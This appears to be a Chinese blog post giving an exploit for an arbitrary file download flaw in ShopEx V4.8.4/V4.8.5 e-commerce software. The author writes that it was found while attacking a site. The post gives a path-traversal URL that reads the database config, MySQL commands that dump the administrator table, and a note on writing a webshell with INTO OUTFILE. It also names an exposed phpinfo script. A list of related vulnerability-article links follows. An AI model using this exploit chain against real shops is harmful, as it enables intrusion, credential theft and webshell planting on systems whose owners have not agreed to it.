ShopexV4.8.4|V4.8.5下載任意檔案漏洞
利用前提是程式所應用的資料庫伺服器而且要是可以外連的,這個很關鍵。
自己搞站時候遇見的站,網上找不到該版本的漏洞,自己拿回原始碼讀了一下。
找到一個漏洞,還是發出來吧。
讀取任意檔案漏洞:
http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php
複製程式碼可以連上資料庫。
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理員使用者密碼./shopadmin/ 登陸
後臺拿shell請參照本部落格《Shopex V4.8.4 V4.8.5 後臺拿Shell 0Days》一文。
我測試的站,直接用into outfile 一個shell。
網上有個帖子,說可以爆物理路徑,測試不可用。
如果install目錄沒刪,下面這個可以看phpinfo
http://www.xx.com/install/svinfo.php?phpinfo=true
複製程式碼另外/home/cache/目錄的檔案,也是可以爆出來的。
相關文章
- 任意檔案下載漏洞的介面URL構造分析與討論
- Vmware Vcenter 任意檔案讀取漏洞
- 任意檔案上傳漏洞修復
- 宏景HCM 任意檔案讀取漏洞
- 新型任意檔案讀取漏洞的研究
- 文字檔案上傳漏洞[任意.繞過.解析]
- 任意檔案讀取與下載的原理及修復
- Hoverfly 任意檔案讀取漏洞(CVE-2024-45388)
- JEEVMS倉庫管理系統任意檔案讀取漏洞
- 藍凌OA前臺任意檔案讀取漏洞利用
- 致遠AnalyticsCloud分析雲任意檔案讀取漏洞復現Cloud
- Grafana 任意檔案讀取漏洞 (CVE-2021-43798)學習Grafana
- 微信小程式開發 -- 通過雲函式下載任意檔案微信小程式函式
- 檔案下載
- Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)復現ApacheMQ
- Windows 10最新零日漏洞:可導致任意檔案被覆寫Windows
- 任意檔案讀取
- JAVA檔案下載Java
- Response下載檔案
- HttpClient 下載檔案HTTPclient
- FastApi下載檔案ASTAPI
- 00、下載檔案
- Ajax 下載檔案
- js 檔案下載JS
- 檔案程式設計、檔案下載程式設計
- 用友任意檔案讀取
- SpringMVC檔案上傳下載(單檔案、多檔案)SpringMVC
- 檔案上傳下載
- Flutter 下載檔案操作Flutter
- python之檔案下載Python
- python 下載檔案demoPython
- Mysql溯源-任意檔案讀取?MySql
- tomcat透過PUT方法任意檔案寫入(CVE-2017-12615)漏洞復現Tomcat
- 米安程式碼審計 06 PHPYUN V3.0 任意檔案上傳漏洞PHP
- 6.1檔案下載、讀取
- goroutine&waitgroup下載檔案GoAI
- 前端如何下載檔案流前端
- 如何下載 Ubuntu 映象檔案?Ubuntu